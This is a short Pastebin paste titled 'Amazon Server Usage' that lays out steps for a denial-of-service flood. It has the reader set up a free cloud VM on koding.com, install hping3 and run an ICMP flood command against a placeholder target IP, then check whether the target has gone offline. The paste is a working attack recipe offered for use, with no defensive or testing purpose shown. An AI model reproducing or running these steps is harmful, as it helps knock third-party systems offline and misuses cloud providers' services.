Advertisement
TheJewishJuggernaut

Amazon Server Usage

Jul 23rd, 2015
210
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.44 KB | None | 0 0
  1. 1. Go to https://koding.com and create an account.
  2. 2. Activate your account using the email you received
  3. 3. Start your VM
  4. 4. Make sure everything is updated. Do this by typing
  5. sudo apt-get update
  6. 5. Install hping3
  7. sudo apt-get install hping3
  8. 6. To start the flooding, type
  9. sudo hping3 -1 --flood IPHERE
  10. 7. To check if the target is still online, go to
  11. http://www.mailradar.com/dns-tools/
  12. 8. To stop the flooding, Simply press CTRL + C
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement